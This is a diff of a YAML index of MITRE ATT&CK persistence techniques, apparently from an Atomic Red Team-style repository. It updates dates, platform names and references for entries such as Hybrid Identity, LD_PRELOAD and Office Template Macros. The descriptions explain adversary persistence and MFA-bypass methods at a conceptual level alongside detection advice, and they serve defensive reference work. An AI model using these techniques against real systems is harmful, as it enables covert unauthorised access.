         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -30077,11 +30507,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:41:16.110Z'
       name: 'Boot or Logon Autostart Execution: Shortcut Modification'
       description: |-
         Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -30094,7 +30523,6 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - David French, Elastic
       - Bobby, Filar, Elastic
@@ -30107,7 +30535,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -30137,7 +30564,8 @@ persistence:
         url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1547.009
     atomic_tests: []
   T1525:
@@ -30169,7 +30597,7 @@ persistence:
         url: https://github.com/RhinoSecurityLabs/ccat
         description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
           Retrieved September 12, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:27:49.094Z'
       name: Implant Internal Image
       description: |-
         Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
@@ -30191,8 +30619,6 @@ persistence:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1547.005:
     technique:
@@ -30218,7 +30644,7 @@ persistence:
         description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
           Retrieved June 24, 2015.
         source_name: Microsoft Configure LSA
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T15:42:48.910Z'
       name: 'Boot or Logon Autostart Execution: Security Support Provider'
       description: |-
         Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -30244,36 +30670,34 @@ persistence:
       - 'Windows Registry: Windows Registry Key Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.005
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -30281,9 +30705,9 @@ persistence:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -30292,21 +30716,22 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -30346,13 +30771,10 @@ persistence:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.004:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:48.453Z'
       name: 'Create or Modify System Process: Launch Daemon'
       description: |-
         Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -30429,12 +30851,11 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1543.004
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -30453,6 +30874,7 @@ persistence:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -30460,7 +30882,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -30480,29 +30901,31 @@ persistence:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1505.003:
@@ -30579,12 +31002,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1505.003
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -30599,6 +31021,7 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -30607,18 +31030,18 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -30650,9 +31073,6 @@ persistence:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1547.003:
@@ -30724,7 +31144,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.003
     atomic_tests: []
   T1546.005:
@@ -30751,7 +31170,7 @@ persistence:
         url: https://bash.cyberciti.biz/guide/Trap_statement
         description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
           2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T16:43:02.273Z'
       name: 'Event Triggered Execution: Trap'
       description: |-
         Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.
@@ -30777,13 +31196,11 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.005
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -30904,7 +31321,6 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1136.001:
@@ -30976,7 +31392,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.001
     atomic_tests: []
   T1547.004:
@@ -31046,7 +31461,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.004
     atomic_tests: []
   T1098.004:
@@ -31156,7 +31570,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.004
     atomic_tests: []
   T1546.012:
@@ -31210,7 +31623,7 @@ persistence:
         description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
           18, 2017.
         source_name: Symantec Ushedix June 2008
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.112Z'
       name: 'Event Triggered Execution: Image File Execution Options Injection'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -31243,8 +31656,6 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.012
     atomic_tests: []
   T1574.005:
@@ -31275,7 +31686,7 @@ persistence:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -31310,12 +31721,10 @@ persistence:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:18.602Z'
       name: 'Event Triggered Execution: Accessibility Features'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -31392,7 +31801,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.008
     atomic_tests: []
   T1136.002:
@@ -31446,7 +31854,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.002
     atomic_tests: []
   T1542.002:
@@ -31478,7 +31885,7 @@ persistence:
           health and make sure it's not already dying on you. Retrieved October 2,
           2018.
         source_name: ITWorld Hard Disk Health Dec 2014
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-01T20:43:55.632Z'
       name: Component Firmware
       description: |-
         Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -31508,55 +31915,10 @@ persistence:
       - SYSTEM
       x_mitre_system_requirements:
       - Ability to update component device firmware from the host operating system.
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1137.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
-      type: attack-pattern
-      created: '2019-11-07T20:29:17.788Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.001
-        url: https://attack.mitre.org/techniques/T1137/001
-      - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
-        description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
-          Retrieved July 3, 2017.
-        source_name: Microsoft Change Normal Template
-      - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
-        description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
-          Retrieved July 3, 2017.
-        source_name: MSDN VBA in Office
-      - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
-        description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
-          Retrieved July 3, 2017.
-        source_name: enigma0x3 normal.dotm
-      - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
-        description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
-          Retrieved July 3, 2017.
-        source_name: Hexacorn Office Template Macros
-      - source_name: GlobalDotName Jun 2019
-        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
-        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
-          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
-      - source_name: CrowdStrike Outlook Forms
-        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
-        description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
-          Movement and Persistence. Retrieved February 5, 2019.
-      - source_name: Outlook Today Home Page
-        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
-        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
-          Retrieved February 5, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:01:35.918Z'
       name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
@@ -31587,6 +31949,7 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: 'Many Office-related persistence mechanisms require changes
         to the Registry and for binaries, files, or scripts to be written to disk
         or existing files modified to include malicious scripts. Collect events related
@@ -31596,9 +31959,13 @@ persistence:
         also be investigated since the base templates should likely not contain VBA
         macros. Changes to the Office macro security settings should also be investigated.(Citation:
         GlobalDotName Jun 2019)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -31606,11 +31973,47 @@ persistence:
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
+      created: '2019-11-07T20:29:17.788Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/001
+        external_id: T1137.001
+      - source_name: MSDN VBA in Office
+        description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
+          Retrieved July 3, 2017.
+        url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
+      - source_name: Hexacorn Office Template Macros
+        description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
+          Retrieved July 3, 2017.
+        url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
+      - source_name: Microsoft Change Normal Template
+        description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
+          Retrieved July 3, 2017.
+        url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
+      - source_name: enigma0x3 normal.dotm
+        description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
+          Retrieved July 3, 2017.
+        url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
+      - source_name: CrowdStrike Outlook Forms
+        description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
+          Movement and Persistence. Retrieved February 5, 2019.
+        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+      - source_name: GlobalDotName Jun 2019
+        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+      - source_name: Outlook Today Home Page
+        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+          Retrieved February 5, 2019.
+        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.001
     atomic_tests: []
   T1546.009:
@@ -31642,7 +32045,7 @@ persistence:
         description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
           Retrieved December 18, 2017.
         source_name: Sysinternals AppCertDlls Oct 2007
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.052Z'
       name: 'Event Triggered Execution: AppCert DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -31690,13 +32093,11 @@ persistence:
       x_mitre_effective_permissions:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.009
     atomic_tests: []
   T1098.005:
     technique:
-      modified: '2023-10-03T17:38:39.065Z'
+      modified: '2024-09-25T20:39:53.597Z'
       name: Device Registration
       description: "Adversaries may register a device to an adversary-controlled account.
         Devices may be registered in a multifactor authentication (MFA) system, which
@@ -31709,16 +32110,16 @@ persistence:
         FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
         only a username and password to enroll the account's first device or to enroll
         a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
-        an adversary with existing access to a network may register a device to Azure
-        AD and/or its device management system, Microsoft Intune, in order to access
+        an adversary with existing access to a network may register a device to Entra
+        ID and/or its device management system, Microsoft Intune, in order to access
         sensitive data or resources while bypassing conditional access policies.(Citation:
         AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
-        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
         be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
         campaigns via intra-organizational emails, which are less likely to be treated
         as suspicious by the email client.(Citation: Microsoft - Device Registration)
         Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
-        on an Azure AD tenant by registering a large number of devices.(Citation:
+        on an Entra ID tenant by registering a large number of devices.(Citation:
         AADInternals - BPRT)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -31730,16 +32131,16 @@ persistence:
       - Mike Moran
       - Joe Gumke, U.S. Bank
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
       - Windows
-      - SaaS
-      x_mitre_version: '1.2'
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Active Directory: Active Directory Object Creation'
@@ -31794,7 +32195,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
